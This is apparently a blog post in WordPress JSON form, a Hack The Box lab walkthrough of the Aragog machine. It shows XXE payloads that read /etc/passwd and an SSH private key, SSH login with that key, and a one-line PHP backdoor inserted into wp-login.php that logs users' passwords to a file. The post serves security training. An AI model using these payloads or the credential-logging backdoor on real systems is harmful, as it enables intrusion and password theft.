{"id":401,"date":"2020-07-21T09:20:39","date_gmt":"2020-07-21T09:20:39","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=401"},"modified":"2021-01-01T14:03:23","modified_gmt":"2021-01-01T14:03:23","slug":"aragog-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/aragog-hackthebox-walkthrough\/","title":{"rendered":"Aragog Hackthebox walkthrough"},"content":{"rendered":"\n

Hey Everyone! Here is another cool machine from hackthebox and its named Aragog! Its a medium level linux machine exploiting one of the owasp top 10 vulnerability. Let’s dive deep to find out the how the box gets pwned.<\/p>\n\n\n\n

Summary<\/h2>\n\n\n\n

The initial foothold is based on exploiting the way the server parses the xml data therefore leading to XXE.<\/strong> The privilege escalation to root is based upon how password logging can be done via creating a php backdoor in wordpress<\/strong>.<\/p>\n\n\n\n

With all that said, lets get started!!<\/p>\n\n\n\n

Starting with nmap scan<\/p>\n\n\n\n

 \u26a1root@kali$~\/Desktop\/htb\/aragog> cat aragog.nmap      # Nmap 7.70 scan initiated Sat Jul 18 19:30:47 2020 as: nmap -sC -sV -o aragog.nmap 10.10.10.78\nNmap scan report for 10.10.10.78\nHost is up (0.27s latency).\nNot shown: 997 closed ports\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt\n| ftp-syst:\n|   STAT:\n| FTP server status:\n|      Connected to ::ffff:10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 2\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)\n|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)\n|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sat Jul 18 19:31:08 2020 -- 1 IP address (1 host up) scanned in 21.76 seconds<\/pre>\n\n\n\n
There was ftp open with allowed anonymous login. So I quickly fired up ftp to see the contents. There was a file test.txt that i downloaded on my local machine.<\/p>\n\n\n\n
root@kali  ~\/Desktop\/htb\/aragog   master  ftp 10.10.10.78Connected to 10.10.10.78.\n220 (vsFTPd 3.0.3)\nName (10.10.10.78:root): anonymous\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt\n226 Directory send OK.\nftp> get test.txt\nlocal: test.txt remote: test.txt\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for test.txt (86 bytes).\n226 Transfer complete.\n86 bytes received in 0.00 secs (1.4141 MB\/s)<\/pre>\n\n\n\n
Contents of test.txt<\/p>\n\n\n\n
 \u26a1root@kali$~\/Desktop\/htb\/aragog> cat test.txt   <details>\n    <subnet_mask>255.255.255.192<\/subnet_mask>\n    <test><\/test>\n<\/details><\/pre>\n\n\n\n
As of now the contents of file dont  make any sense. So just made the note of file. <\/p>\n\n\n\n
Moving ahead!<\/p>\n\n\n\n
Initial Foothold<\/h2>\n\n\n\n
Started up a gobuster scan as port 80 was open<\/p>\n\n\n\n
# gobuster -u http:\/\/10.10.10.68 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/big.txt -t 50 -x php<\/pre>\n\n\n\n
Got a file hosts.php<\/p>\n\n\n\n
On page http:\/\/10.10.10.78\/hosts.php<\/a>, a page landed<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So that is a vague information, but seems like some sort of hosts calculation. So I captured the request in burp and added the contents of test.txt obtained earlier.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Cool !! It is calculation hosts based on the subnet mask provided. But an interesting thing to look it that request is containing xml. So the only thing that comes to mind is XXE!!<\/p>\n\n\n\n
I googled for payloadallthethings<\/span><\/a>  crafted a payload to see if i am able to retrieve the contents of local files such as \/etc\/passwd<\/strong><\/p>\n\n\n\n
<?xml version=\"1.0\"?><!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:\/\/\/etc\/passwd'>]>\n<details>\n    <subnet_mask>&test1;<\/subnet_mask>\n    <test><\/test>\n<\/details><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Awesome! The contents are visible and I could see 2 users listed florian and cliff. As a next step, I tried to grep any id_rsa files if present.<\/p>\n\n\n\n
\/home\/cliff\/.ssh\/id_rsa didnt worked out but \/home\/florian\/.ssh\/id_rsa worked like a charm and now I have the RSA private key.<\/p>\n\n\n\n
<?xml version=\"1.0\"?><!DOCTYPE test [<!ENTITY test1 SYSTEM 'file:\/\/\/home\/florian\/.ssh\/id_rsa'>]>\n<details>\n    <subnet_mask>&test1;<\/subnet_mask>\n    <test><\/test>\n<\/details>   <\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
I then logged in with florian<\/p>\n\n\n\n
# chmod 600 id_rsa\n# ssh -i id_rsa florian@10.10.10.78\n# cat user.txt <\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Privilege escalation!!<\/h2>\n\n\n\n
I uploaded LinEnum.sh to the box and enumerated and surprisingly there were a lot of wordpress files present. There was a folder dev_wiki that had the wordpress installed but didnt got enumerated in the gobuster scan. There are a lots of enumeration results that can lead you to wrong direction like password of database in wp-config file. Yes you are definitely gonna find the administrator password hash in the tables, but its simply uncrackable. <\/p>\n\n\n\n
After listing the contents of dev_wiki, I found out that it was world writable.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So I went to http:\/\/aragog\/dev_wiki <\/strong>to find out any useful information. Do an entry in \/etc\/hosts<\/strong> as 10.10.10.78<\/strong>  aragog so that the page can be fully rendered (ps: there’s virtual routing).<\/p>\n\n\n\n
I found a blog by Administrator<\/strong>. Here the user cliff has administrator privileges. Also he writes that he\u2019ll be logging in regularly, which means that his password can be sniffed using a backdoor in WordPress.<\/p>\n\n\n\n
Let\u2019s see how we can make one<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Open wp-login.php<\/strong> under dev_wiki<\/strong> and under the switch operation: login add the following line. The code is gonna create a file named .passwords<\/strong> and will store the username and password as anyone logs in. Since we read in the blog earlier, that cliff will be logging in regularly, we will end up getting his password.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
file_put_contents(\".passwords\", $_POST['log']. \":\". $_POST['pwd']. \"\\n\", FILE_APPEND);<\/pre>\n\n\n\n
Here\u2019s the dummy request to check if out payload is working fine or not ( the step is optional)<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
So A new file has been created.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Lets grab the contents<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Amazing we found the password!<\/p>\n\n\n\n
Administrator:!KRgYs(JFO!&MTr)lf<\/strong><\/p>\n\n\n\n
So lets try out the password with different accounts like cliff\/root. And it worked with root!! (As the users have the habit of reusing passwords!)<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The privilege escalation of the box is totally based upon real world situations where users tend to use same passwords at multiple places that should be totally avoided. Passwords should always be built of random characters and should stored in a trusted password manager. <\/p>\n\n\n\n
Thats all for the blog post! Thanks for reading!!
\nSee you in the next one ! Until then, happy hunting \ud83d\ude42<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Aragog is a medium level linux machine from hackthebox. Initial foothold is based on exploiting XXE and the privilege escalation requires to log the password by creating a backdoor.<\/p>\n","protected":false},"author":1,"featured_media":408,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[234,26,54,236,226,126,60,235,233],"class_list":["post-401","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-aragog","tag-hackthebox","tag-htb","tag-password-logging","tag-penetration-testing","tag-php","tag-privilege-escaltion","tag-wordpress","tag-xxe","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=401"}],"version-history":[{"count":4,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401\/revisions"}],"predecessor-version":[{"id":531,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/401\/revisions\/531"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/408"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=401"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=401"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=401"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}